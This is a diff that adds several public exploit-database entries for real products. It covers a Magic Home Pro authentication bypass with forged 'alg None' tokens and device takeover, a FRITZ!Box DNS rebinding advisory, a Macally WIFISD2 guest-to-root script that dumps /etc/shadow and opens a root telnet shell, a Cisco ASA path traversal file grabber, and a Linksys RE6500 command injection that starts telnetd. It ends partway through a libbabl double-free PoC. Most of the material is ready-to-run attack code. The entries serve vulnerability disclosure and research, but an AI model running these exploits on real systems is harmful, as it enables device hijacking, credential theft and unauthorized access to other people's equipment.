diff --git a/exploits/android/webapps/49266.py b/exploits/android/webapps/49266.py
new file mode 100755
index 000000000..bd5b0c746
--- /dev/null
+++ b/exploits/android/webapps/49266.py
@@ -0,0 +1,292 @@
+# Exploit Title: Magic Home Pro 1.5.1 - Authentication Bypass 
+# Google Dork: NA
+# Date: 22 October 2020
+# Exploit Author: Victor Hanna (Trustwave SpiderLabs)
+# Author Github Page: https://9lyph.github.io/CVE-2020-27199/
+# Vendor Homepage: http://www.zengge.com/appkzd
+# Software Link: https://play.google.com/store/apps/details?id=com.zengge.wifi&hl=en
+# Version: 1.5.1 (REQUIRED)
+# Tested on: Android 10
+
+## Enumeration ##
+
+import requests
+import json
+import os
+from colorama import init
+from colorama import Fore, Back, Style
+import re
+
+'''
+1. First Stage Authentication
+2. Second Stage Enumerate
+3. Third Stage Remote Execute
+'''
+
+global found_macaddresses
+found_macaddresses = []
+global outtahere
+outtahere = ""
+q = "q"
+global token
+
+
+def turnOn(target, token):
+
+    urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
+    array = {
+        "dataCommandItems":[
+            {"hexData":"71230fa3","macAddress":target}
+        ]
+    }
+    data = json.dumps(array)
+    headersOn = {
+        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
+        "Accept-Language": "en-US",
+        "Accept": "application/json", 
+        "Content-Type": "application/json; charset=utf-8",
+        "token":token,
+        "Host": "wifij01us.magichue.net",
+        "Connection": "close",
+        "Accept-Encoding": "gzip, deflate"
+    }
+    print (Fore.WHITE + "[+] Sending Payload ...")
+    response = requests.post(urlOn, data=data, headers=headersOn)
+    if response.status_code == 200:
+        if "true" in response.text:
+            print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched On")
+        else:
+            print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")
+
+def turnOff(target, token):
+
+    urlOff = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001"
+    array = {
+        "dataCommandItems":[
+            {"hexData":"71240fa4","macAddress":target}
+        ]
+    }
+    data = json.dumps(array)
+    headersOff = {
+        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
+        "Accept-Language": "en-US",
+        "Accept": "application/json", 
+        "Content-Type": "application/json; charset=utf-8",
+        "token":token,
+        "Host": "wifij01us.magichue.net",
+        "Connection": "close",
+        "Accept-Encoding": "gzip, deflate"
+    }
+    print (Fore.WHITE + "[+] Sending Payload ...")
+    response = requests.post(urlOff, data=data, headers=headersOff)
+    if response.status_code == 200:
+        if "true" in response.text:
+            print (Fore.GREEN + "[*] Endpoint " + Style.RESET_ALL + f"{target}" + Fore.GREEN + " Switched Off")
+        else:
+            print (Fore.RED + "[-] Failed to switch on Endpoint " + Style.RESET_ALL + f"{target}")
+
+def lighItUp(target, token):
+
+    outtahere = ""
+    q = "q"
+    if len(str(target)) < 12:
+        print (Fore.RED + "[!] Invalid target" + Style.RESET_ALL)
+    elif re.match('[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}[0-9a-f]{2}$', target.lower()):
+        while outtahere.lower() != q.lower():
+            if outtahere == "0":
+                turnOn(target, token)
+            elif outtahere == "1":
+                turnOff(target, token)
+            outtahere = input(Fore.BLUE + "ON/OFF/QUIT ? (0/1/Q): " + Style.RESET_ALL)
+
+def Main():
+    urlAuth = "https://wifij01us.magichue.net/app/login/ZG001"
+
+    data = {
+        "userID":"<Valid Registered Email/Username>",
+        "password":"<Valid Registered Password>",
+        "clientID":""
+    }
+
+    headersAuth = {
+        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
+        "Accept-Language": "en-US",
+        "Accept": "application/json", 
+        "Content-Type": "application/json; charset=utf-8",
+        "Host": "wifij01us.magichue.net",
+        "Connection": "close",
+        "Accept-Encoding": "gzip, deflate"
+    }
+
+    # First Stage Authenticate
+
+    os.system('clear')
+    print (Fore.WHITE + "[+] Authenticating ...")
+    response = requests.post(urlAuth, json=data, headers=headersAuth)
+    resJsonAuth = response.json()
+    token = (resJsonAuth['token'])
+
+    # Second Stage Enumerate
+
+    print (Fore.WHITE + "[+] Enumerating ...")
+    macbase = "C82E475DCE"
+    macaddress = []
+    a = ["%02d" % x for x in range(100)]
+    for num in a:
+        macaddress.append(macbase+num)
+
+    with open('loot.txt', 'w') as f:
+        for mac in macaddress:
+            urlEnum = "https://wifij01us.magichue.net/app/getBindedUserListByMacAddress/ZG001"
+            params = {
+                "macAddress":mac
+            }
+
+            headersEnum = {
+                "User-Agent": "Magic Home/1.5.1(ANDROID,9,en-US)",
+                "Accept-Language": "en-US",
+                "Content-Type": "application/json; charset=utf-8",
+                "Accept": "application/json",
+                "token": token,
+                "Host": "wifij01us.magichue.net",
+                "Connection": "close",
+                "Accept-Encoding": "gzip, deflate"
+            }
+
+            response = requests.get(urlEnum, params=params, headers=headersEnum)
+            resJsonEnum = response.json()
+            data = (resJsonEnum['data'])
+            if not data:
+                pass
+            elif data:
+                found_macaddresses.append(mac)
+                print (Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}")
+                f.write(Fore.GREEN + "[*] MAC Address Identified: " + Style.RESET_ALL + f"{mac}" + Fore.GREEN + f", User: " + Style.RESET_ALL + f"{(data[0]['userName'])}, " + Fore.GREEN + "Unique ID: " + Style.RESET_ALL + f"{data[0]['userUniID']}, " + Fore.GREEN + "Binded ID: " + Style.RESET_ALL + f"{data[0]['bindedUniID']}\n")
+            else:
+                print (Fore.RED + "[-] No results found!")
+                print(Style.RESET_ALL)
+
+        if not found_macaddresses:
+            print (Fore.RED + "[-] No MAC addresses retrieved")
+        elif found_macaddresses:
+            attackboolean = input(Fore.BLUE + "Would you like to Light It Up ? (y/N): " + Style.RESET_ALL)
+            if (attackboolean.upper() == 'Y'):
+                target = input(Fore.RED + "Enter a target device mac address: " + Style.RESET_ALL)
+                lighItUp(target, token)
+            elif (attackboolean.upper() == 'N'):
+                print (Fore.CYAN + "Sometimes, belief isn’t about what we can see. It’s about what we can’t."+ Style.RESET_ALL)
+            else:
+                print (Fore.CYAN + "The human eye is a wonderful device. With a little effort, it can fail to see even the most glaring injustice." + Style.RESET_ALL)
+
+if __name__ == "__main__":
+    Main()
+
+## Token Forging ##
+
+#!/usr/local/bin/python3
+
+import url64
+import requests
+import json
+import sys
+import os
+from colorama import init
+from colorama import Fore, Back, Style
+import re
+import time
+from wsgiref.handlers import format_date_time
+from datetime import datetime
+from time import mktime
+
+now = datetime.now()
+stamp = mktime(now.timetuple())
+
+'''
+HTTP/1.1 200
+Server: nginx/1.10.3
+Content-Type: application/json;charset=UTF-8
+Connection: close
+
+"{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http:\/\/wifij01us.magichue.net\/app\/ota\/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\"\",\"userEmail\":\"\",\"userUniID\":\"\"},\"token\":\"\"}"
+'''
+
+def Usage():
+    print (f"Usage: {sys.argv[0]} <username> <unique id>")
+
+def Main(user, uniqid):
+    os.system('clear')
+    print ("[+] Encoding ...")
+    print ("[+] Bypass header created!")
+    print ("HTTP/1.1 200")
+    print ("Server: nginx/1.10.3")
+    print ("Date: "+str(format_date_time(stamp))+"")
+    print ("Content-Type: application/json;charset=UTF-8")
+    print ("Connection: close\r\n\r\n")
+
+    jwt_header = '{"typ": "JsonWebToken","alg": "None"}'
+    jwt_data = '{"userID": "'+user+'", "uniID": "'+uniqid+'","cdpid": "ZG001","clientID": "","serverCode": "US","expireDate": 1618264850608,"refreshDate": 1613080850608,"loginDate": 1602712850608}'
+    jwt_headerEncoded = url64.encode(jwt_header.strip())
+    jwt_dataEncoded = url64.encode(jwt_data.strip())
+    jwtcombined = (jwt_headerEncoded.strip()+"."+jwt_dataEncoded.strip()+".")
+    print ("{\"code\":0,\"msg\":\"\",\"data\":{\"webApi\":\"wifij01us.magichue.net/app\",\"webPathOta\":\"http://wifij01us.magichue.net/app/ota/download\",\"tcpServerController\":\"TCP,8816,ra8816us02.magichue.net\",\"tcpServerBulb\":\"TCP,8815,ra8815us02.magichue.net\",\"tcpServerControllerOld\":\"TCP,8806,mhc8806us.magichue.net\",\"tcpServerBulbOld\":\"TCP,8805,mhb8805us.magichue.net\",\"sslMqttServer\":\"ssl:\/\/192.168.0.112:1883\",\"serverName\":\"Global\",\"serverCode\":\"US\",\"userName\":\""+user+"\",\"userEmail\":\""+user+"\",\"userUniID\":\""+uniqid+"\"},\"token\":\""+jwtcombined+"\"}")
+
+if __name__ == "__main__":
+    if len(sys.argv) < 3:
+        Usage()
+    else:
+        Main(sys.argv[1], sys.argv[2])
+
+## Device Takeover PoC ##
+
+#!/usr/local/bin/python3
+
+import url64
+import requests
+import json
+import sys
+import os
+from colorama import init
+from colorama import Fore, Back, Style
+import re
+
+def Usage():
+    print (f"Usage: {sys.argv[0]} <attacker email> <target email> <target mac address> <target forged token>")
+
+def Main():
+
+    attacker_email = sys.argv[1]
+    target_email = sys.argv[2]
+    target_mac = sys.argv[3]
+    forged_token = sys.argv[4]
+
+    os.system('clear')
+    print (Fore.WHITE + "[+] Sending Payload ...")
+    url = "https://wifij01us.magichue.net/app/shareDevice/ZG001"
+
+    array = {"friendUserID":attacker_email, "macAddress":target_mac}
+
+    data = json.dumps(array)
+
+    headers = {
+        "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)",
+        "Accept-Language": "en-US",
+        "Accept": "application/json", 
+        "Content-Type": "application/json; charset=utf-8",
+        "token":forged_token,
+        "Host": "wifij01us.magichue.net",
+        "Connection": "close",
+        "Accept-Encoding": "gzip, deflate"
+    }
+    
+    response = requests.post(url, data=data, headers=headers)
+    if response.status_code == 200:
+        if "true" in response.text:
+            print (Fore.GREEN + "[*] Target is now yours ... " + Style.RESET_ALL)
+        else:
+            print (Fore.RED + "[-] Failed to take over target !" + Style.RESET_ALL)
+
+if __name__ == "__main__":
+    if len(sys.argv) < 5:
+        Usage()
+    else:
+        Main()
\ No newline at end of file
diff --git a/exploits/hardware/remote/49293.txt b/exploits/hardware/remote/49293.txt
new file mode 100644
index 000000000..b57f9a2ac
--- /dev/null
+++ b/exploits/hardware/remote/49293.txt
@@ -0,0 +1,191 @@
+# Exploit Title: FRITZ!Box 7.20 - DNS Rebinding Protection Bypass
+# Date: 2020-06-23
+# Exploit Author: RedTeam Pentesting GmbH
+# Vendor Homepage: https://en.avm.de/
+# Version: 7.20
+# CVE: 2020-26887
+
+Advisory: FRITZ!Box DNS Rebinding Protection Bypass
+
+RedTeam Pentesting discovered a vulnerability in FRITZ!Box router
+devices which allows to resolve DNS answers that point to IP addresses
+in the private local network, despite the DNS rebinding protection
+mechanism.
+
+
+Details
+=======
+
+Product: FRITZ!Box 7490 and potentially others
+Affected Versions:  7.20 and below
+Fixed Versions: >= 7.21
+Vulnerability Type: Bypass
+Security Risk: low
+Vendor URL: https://en.avm.de/
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2020-003
+Advisory Status: published
+CVE: 2020-26887 
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-26887
+
+
+Introduction
+============
+
+"For security reasons, the FRITZ!Box suppresses DNS responses that refer
+to IP addresses in its own home network. This is a security function of
+the FRITZ!Box to protect against what are known as DNS rebinding
+attacks."
+
+(from the vendor's homepage)
+
+
+More Details
+============
+
+FRITZ!Box router devices employ a protection mechanism against DNS
+rebinding attacks. If a DNS answer points to an IP address in the
+private network range of the router, the answer is suppressed. Suppose
+the FRITZ!Box routers DHCP server is in its default configuration and
+serves the private IP range of 192.168.178.1/24. If a DNS request is
+made by a connected device, which resolves to an IPv4 address in the
+configured private IP range (for example 192.168.178.20) an empty answer
+is returned. However, if instead the DNS answer contains an AAAA-record
+with the same private IP address in its IPv6 representation
+(::ffff:192.168.178.20) it is returned successfully. Furthermore, DNS
+requests which resolve to the loopback address 127.0.0.1 or the special
+address 0.0.0.0 can be retrieved, too.
+
+
+Proof of Concept
+================
+
+Supposing the following resource records (RR) are configured for different
+subdomains of example.com:
+
+------------------------------------------------------------------------
+private.example.com        1  IN  A     192.168.178.20
+local.example.com          1  IN  A     127.0.0.1
+privateipv6.example.com.   1  IN  AAAA  ::ffff:192.168.178.20
+------------------------------------------------------------------------
+
+A DNS request to the FRITZ!Box router for the subdomain
+private.example.com returns an empty answer, as expected:
+
+------------------------------------------------------------------------
+$ dig private.example.com @192.168.178.1
+; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> private.example.com @192.168.178.1
+;; global options: +cmd
+;; Got answer:
+;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 58984
+;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
+
+;; QUESTION SECTION:
+;private.example.com.	IN	A
+------------------------------------------------------------------------
+
+DNS requests for the subdomains privateipv6.example.com and
+local.example.com return the configured resource records successfully,
+effectively bypassing the DNS rebinding protection:
+
+------------------------------------------------------------------------
+$ dig privateipv6.example.com @192.168.178.1 AAAA
+; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> @192.168.178.1 privateipv6.example.com AAAA
+; (1 server found)
+;; global options: +cmd
+;; Got answer:
+;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6510
+;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3
+
+;; OPT PSEUDOSECTION:
+; EDNS: version: 0, flags:; udp: 4096
+;; QUESTION SECTION:
+;privateipv6.example.com.	IN	AAAA
+
+;; ANSWER SECTION:
+privateipv6.example.com. 1	IN	AAAA	::ffff:192.168.178.20
+
+
+$ dig local.example.com @192.168.178.1
+; <<>> DiG 9.11.5-P4-5.1+deb10u1-Debian <<>> local.example.com @192.168.178.1
+;; global options: +cmd
+;; Got answer:
+;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28549
+;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 3
+
+;; OPT PSEUDOSECTION:
+; EDNS: version: 0, flags:; udp: 4096
+;; QUESTION SECTION:
+;local.example.com.	IN	A
+
+;; ANSWER SECTION:
+local.example.com. 1	IN	A	127.0.0.1
+------------------------------------------------------------------------
+
+
+Workaround
+==========
+
+None.
+
+
+Fix
+===
+
+The problem is corrected in FRITZ!OS 7.21.
+
+
+Security Risk
+=============
+
+As shown, the DNS rebinding protection of FRITZ!Box routers can be
+bypassed allowing for DNS rebinding attacks against connected devices.
+This type of attack however is only possible if vulnerable services are
+present in the local network, which are reachable over HTTP without
+authentication. The web interface of FRITZ!Box routers for example is
+not vulnerable to this type of attack, since the HTTP Host header is
+checked for known domains. For this reason the risk is estimated to be
+low.
+
+
+Timeline
+========
+
+2020-06-23 Vulnerability identified
+2020-07-08 Vendor notified
+2020-07-20 Vendor provided fixed version to RedTeam Pentesting
+2020-07-23 Vendor notified of another problematic IP
+2020-08-06 Vendor provided fixed version to RedTeam Pentesting
+2020-10-06 Vendor starts distribution of fixed version for selected devices 
+2020-10-19 Advisory released
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests performed by a
+team of specialised IT-security experts. Hereby, security weaknesses in
+company networks or products are uncovered and can be fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at:
+https://www.redteam-pentesting.de/
+
+
+Working at RedTeam Pentesting
+=============================
+
+RedTeam Pentesting is looking for penetration testers to join our team
+in Aachen, Germany. If you are interested please visit:
+https://www.redteam-pentesting.de/jobs/
+
+-- 
+RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
+Dennewartstr. 25-27                       Fax : +49 241 510081-99
+52068 Aachen                    https://www.redteam-pentesting.de
+Germany                         Registergericht: Aachen HRB 14004
+Geschäftsführer:                       Patrick Hof, Jens Liebchen
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49256.py b/exploits/hardware/webapps/49256.py
new file mode 100755
index 000000000..20f038900
--- /dev/null
+++ b/exploits/hardware/webapps/49256.py
@@ -0,0 +1,140 @@
+# Exploit Title: Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation
+# Date: 03.12.2020 
+# Exploit Author: Maximilian Barz and Daniel Schwendner
+# Vendor Homepage: https://us.macally.com/products/wifisd2
+# Version: 2.000.010
+# Tested on: Kali Linux 5.7.0-kali1-amd64
+# CVE : CVE-2020-29669
+# Reference: https://github.com/S1lkys/CVE-2020-29669/
+
+#!/usr/bin/env/python3
+import requests
+import telnetlib
+import os
+import sys
+import re
+
+banner = '''\033[94m
+  ██████ ▄▄▄█████▓ ▄▄▄       ██▀███   ▄▄▄▄    █    ██  ██▀███    ██████ ▄▄▄█████▓
+▒██    ▒ ▓  ██▒ ▓▒▒████▄    ▓██ ▒ ██▒▓█████▄  ██  ▓██▒▓██ ▒ ██▒▒██    ▒ ▓  ██▒ ▓▒
+░ ▓██▄   ▒ ▓██░ ▒░▒██  ▀█▄  ▓██ ░▄█ ▒▒██▒ ▄██▓██  ▒██░▓██ ░▄█ ▒░ ▓██▄   ▒ ▓██░ ▒░
+  ▒   ██▒░ ▓██▓ ░ ░██▄▄▄▄██ ▒██▀▀█▄  ▒██░█▀  ▓▓█  ░██░▒██▀▀█▄    ▒   ██▒░ ▓██▓ ░ 
+▒██████▒▒  ▒██▒ ░  ▓█   ▓██▒░██▓ ▒██▒░▓█  ▀█▓▒▒█████▓ ░██▓ ▒██▒▒██████▒▒  ▒██▒ ░ 
+▒ ▒▓▒ ▒ ░  ▒ ░░    ▒▒   ▓▒█░░ ▒▓ ░▒▓░░▒▓███▀▒░▒▓▒ ▒ ▒ ░ ▒▓ ░▒▓░▒ ▒▓▒ ▒ ░  ▒ ░░   
+░ ░▒  ░ ░    ░      ▒   ▒▒ ░  ░▒ ░ ▒░▒░▒   ░ ░░▒░ ░ ░   ░▒ ░ ▒░░ ░▒  ░ ░    ░    
+░  ░  ░    ░        ░   ▒     ░░   ░  ░    ░  ░░░ ░ ░   ░░   ░ ░  ░  ░    ░      
+      ░                 ░  ░   ░      ░         ░        ░           ░           
+                                           ░                                     
+\x1b[0m
+Macally WIFISD2 Guest to Root Privilege Escalation for CVE-2020-29669 by Maximilian Barz and Daniel Schwendner 
+'''
+def main():
+    if(len(sys.argv) < 2):
+        print(banner)
+        print("Usage: %s <host> " % sys.argv[0])
+        print("Eg:    %s 1.2.3.4 " % sys.argv[0])
+        return
+    rhost = sys.argv[1]
+    session = requests.Session()
+    guest_creds = "guest_pass"
+    admin_pass_to_set = "Silky123"
+
+    def send_requests():
+        url = "http://"+rhost+"/protocol.csp?function=set"
+        payload = {'fname':'security','opt':'pwdchk','name':'guest','pwd1':guest_creds,'function':'set'}
+        headers = {
+            'Host': rhost,
+            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+            'Accept': '*/*',
+            'Accept-Language': 'en-US,en;q=0.5',
+            'Accept-Encoding': 'gzip, deflate',
+            'Referer': 'http://'+rhost+'/index.html',
+            'Content-Type': 'application/x-www-form-urlencoded',
+            'Content-Length': '65',
+            'Connection': 'close',
+            'Cache-Control': 'no-cache',
+        }
+        
+        r= session.post(url, payload, headers)
+        if (b"<errno>0</errno>" in r.content):
+            print("\033[92m[+] Authentication successful\x1b[0m")
+            print("\t"+str(session.cookies.get_dict()))
+        else:
+            print("\033[91m[+] Authentication failed.\x1b[0m")
+            sys.exit()
+
+        url = "http://"+rhost+"/protocol.csp?fname=security&function=set"    
+        payload = {'name':'admin','opt':'pwdmod','pwd1':admin_pass_to_set,'pwd2':admin_pass_to_set}
+        headers = {
+            'Host': rhost,
+            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
+            'Accept': '*/*',
+            'Accept-Language': 'en-US,en;q=0.5',
+            'Accept-Encoding': 'gzip, deflate',
+            'Referer': 'http://'+rhost+'/app/user/guest.html',
+            'Content-Type': 'application/x-www-form-urlencoded',
+            'Content-Length': '49',
+            'Connection': 'close',
+            'Cache-Control': 'no-cache',
+        }
+        d = session.post(url, payload, headers)
+        if (b"<errno>0</errno>" in d.content):
+            print("\033[92m[+] Admin Password changed to: "+admin_pass_to_set+"\x1b[0m")
+            telnet_grep_root_hash()
+            #print("[+] Spawning Admin Shell")
+            #telnet_login()
+        else:
+            print("\033[91m[+] Admin Password change failed\x1b[0m")
+            sys.exit()
+
+
+    def telnet_grep_root_hash():
+        user = "admin"
+        tn = telnetlib.Telnet(rhost)
+        tn.read_until(b"login: ")
+        tn.write(user.encode('ascii') + b"\n")
+        tn.read_until(b"Password: ")
+        tn.write(admin_pass_to_set.encode('ascii') + b"\n")
+        print("\033[92m[+] Dumping Hashes:\x1b[0m")
+        tn.write(b"cat /etc/shadow\n\r")
+        tn.write(b"exit\n")
+        output = tn.read_all().decode('ascii')
+        L = output.split('\n')
+        for hash in L:
+            if ":" in hash:
+                print("\t"+hash)
+        print("\n\r")
+        for hash in L:
+            if "root" in hash:
+                print("\033[92m[+] Root Hash found, trying to crack it..\x1b[0m")
+                print("\t"+hash)  #root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::
+                f = open("root_hash","w+")
+                f.write(hash)
+                f.close()
+                crack_root_hash();
+
+
+    def crack_root_hash():
+        f = open("root_hash", "r")
+        hash = f.read()
+        if ("root:$1$D0o034Sm$LY0jyeFPifEXVmdgUfSEj/:15386:0:99999:7:::" in hash):
+            print("\033[92mRoot Password: 20080826\x1b[0m\n")
+            telnet_login()
+        else:
+            os.system("hashcat -a 0 -m 500 root_hash /root/tools/routersploit/routersploit/resources/wordlists/passwords.txt") #https://github.com/threat9/routersploit/blob/master/routersploit/resources/wordlists/passwords.txt
+
+    def telnet_login():
+        print("\033[92m[+] Spawning Rootshell\x1b[0m")
+        user = "root"
+        root_password="20080826"
+        tn = telnetlib.Telnet(rhost)
+        tn.read_until(b"login: ")
+        tn.write(user.encode('ascii') + b"\n")
+        tn.read_until(b"Password: ")
+        tn.write(root_password.encode('ascii') + b"\n")
+        tn.interact()
+    print(banner)
+    send_requests()
+
+if(__name__ == '__main__'):
+    main()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49262.py b/exploits/hardware/webapps/49262.py
new file mode 100755
index 000000000..3ae7ad1f6
--- /dev/null
+++ b/exploits/hardware/webapps/49262.py
@@ -0,0 +1,113 @@
+# Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)
+# Date: 12 Dec 2020
+# Exploit Author: Freakyclown@cygenta.co.uk
+# Vendor Homepage: cisco.com
+# Software Link: It’s against Hardware, specifically ASA’s and FTD’s
+# Version: ASAs (from version 9.6 to 9.14.1.10) and FTD’s (versions 6.2.3 to 6.6.0.1)
+# Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14
+# CVE : CVE-2020-3452
+# Github : https://github.com/cygenta/CVE-2020-3452
+
+import requests
+
+# Written by freakyclown for @CygentaHQ
+# Cisco ASA Path Traversal
+# CVE-2020-3452
+# Usage: CVE-2020-3452.py {target}"
+# Example: CVE-2020-3452.py 192.168.0.12"
+# Requires - Requests - pip3 install requests
+#
+# This tool takes advantage of the above cve and attempts to
+# download files as listed below, it is suggested that you make
+# a working folder for the outputfiles to avoid confusion if
+# attacking mutliple ASA's
+
+# set your target
+target = input("Enter target IP/Url: ")
+
+
+def grabstuff():
+    for file in files:
+        print("trying: ", file)
+
+        #set request parameters
+        params = (
+            ('type', 'mst'),
+            ('textdomain', '+CSCOE+/'+file),
+            ('default-language', ''),
+            ('lang', '../'),
+        )
+
+        # set the response to the result of the request, inputting in target and params and ignoring ssl cert problems
+        response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False)
+        # write the file to the disk
+        f = open(file,"w")
+        f.write(response.text) 
+        f.close()
+
+
+
+# this is a list of files available to download, more will be added in time
+# if anyone has a list of ASA files, I'd be happy to add here
+files = {
+"sess_update.html",
+"blank.html",
+"noportal.html",
+"portal_ce.html",
+"portal.html",
+"logon_custom.css",
+"svc.html",
+"logo.gif",
+"portal_inc.lua",
+"nostcaccess.html",
+"session.js",
+"portal.js",
+"portal_custom.css",
+"running.conf",
+"tlbrportal_forms.js",
+"logon_forms.js",
+"win.js",
+"portal.css",
+"lced.html",
+"pluginlib.js",
+"useralert.html",
+"ping.html",
+"app_index.html",
+"shshimdo_url",
+"session_password.html",
+"relayjar.html",
+"relayocx.html",
+"color_picker.js",
+"color_picker.html",
+"cedhelp.html",
+"cedmain.html",
+"cedlogon.html",
+"cedportal.html",
+"portal_elements.html",
+"commonspawn.js",
+"common.js",
+"appstart.js",
+"relaymonjar.html",
+"relaymonocx.html",
+"cedsave.html",
+"tunnel_linux.jnlp",
+"ask.html",
+"no_svc.html",
+"preview.html",
+"cedf.html",
+"ced.html",
+"logon_redirect.html",
+"logout.html",
+"tunnel_mac.jnlp",
+"gp-gip.html",
+"auth.html",
+"wrong_url.html",
+"logon.html"}
+
+
+# obvious thing is obvious, try the things and barf if fail
+try:
+    grabstuff()
+except Exception as err:
+    print("Something went wrong sorry")
+    print(err)
\ No newline at end of file
diff --git a/exploits/hardware/webapps/49270.py b/exploits/hardware/webapps/49270.py
new file mode 100755
index 000000000..93f9c27ed
--- /dev/null
+++ b/exploits/hardware/webapps/49270.py
@@ -0,0 +1,54 @@
+# Exploit Title: Linksys RE6500 1.0.11.001 - Unauthenticated RCE
+# Date: 31/07/2020
+# Exploit Author: RE-Solver
+# Public disclosure: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html#4
+# Vendor Homepage: www.linksys.com
+# Version:  FW V1.05 up to FW v1.0.11.001
+# Tested on: FW V1.05 up to FW v1.0.11.001
+# Linksys RE6500 V1.0.05.003 and newer - Unauthenticated RCE
+# Unsanitized user input in the web interface for Linksys WiFi extender RE6500 allows Unauthenticated remote command execution. 
+# An attacker can access system OS configurations and commands that are not intended for use beyond the web UI. 
+
+#!/usr/bin/env python
+
+from requests import Session
+import requests
+import os
+print("Linksys RE6500, RE6500 - Unsanitized user input allows Unauthenticated remote command execution.")
+print("Tested on FW V1.05 up to FW v1.0.11.001")
+print("RE-Solver @solver_re")
+ip="192.168.1.226"
+
+command="nvram_get Password >/tmp/lastpwd"
+#save device password;
+post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
+url_codeinjection="http://"+ip+"/goform/setSysAdm"
+s = requests.Session()
+s.headers.update({'Origin': "http://"+ip})
+s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
+
+r= s.post(url_codeinjection, data=post_data)
+if r.status_code == 200:
+    print("[+] Prev password saved in /tmp/lastpwd")
+
+command="busybox telnetd"
+#start telnetd;
+post_data="admuser=admin&admpass=;"+command+";&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
+url_codeinjection="http://"+ip+"/goform/setSysAdm"
+s = requests.Session()
+s.headers.update({'Origin': "http://"+ip})
+s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
+
+r=s.post(url_codeinjection, data=post_data)
+if r.status_code == 200:
+    print("[+] Telnet Enabled")
+
+#set admin password
+post_data="admuser=admin&admpass=0000074200016071000071120003627500015159&confirmadmpass=admin&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1"
+url_codeinjection="http://"+ip+"/goform/setSysAdm"
+s = requests.Session()
+s.headers.update({'Origin': "http://"+ip})
+s.headers.update({'Referer': "http://"+ip+"/login.shtml"})
+r=s.post(url_codeinjection, data=post_data)
+if r.status_code == 200:
+    print("[+] Prevent corrupting nvram - set a new password= admin")
\ No newline at end of file
diff --git a/exploits/linux/local/49259.c b/exploits/linux/local/49259.c
new file mode 100644
index 000000000..524a43d2c
--- /dev/null
+++ b/exploits/linux/local/49259.c
@@ -0,0 +1,57 @@
+# Exploit Title: libbabl 0.1.62 - Broken Double Free Detection (PoC)
+# Date: December 14, 2020
+# Exploit Author: Carter Yagemann
+# Vendor Homepage: https://www.gegl.org
+# Software Link: https://www.gegl.org/babl/
+# Version: libbabl 0.1.62 and newer
+# Tested on: Debian Buster (Linux 4.19.0-9-amd64)
+# Compile: gcc -Ibabl-0.1 -lbabl-0.1 babl-0.1.62_babl_free.c
+
+/*
+ * Babl has an interesting way of managing buffers allocated and freed using babl_malloc()
+ * and babl_free(). This is the structure of its allocations (taken from babl-memory.c):
+ *
+ * typedef struct
+ * {
+ *   char  *signature;
+ *   size_t size;
+ *   int  (*destructor)(void *ptr);
+ * } BablAllocInfo;
+ *
+ *
+ * signature is used to track whether a chunk was allocated by babl, and if so, whether
+ * it is currently allocated or freed. This is done by either pointing it to the global
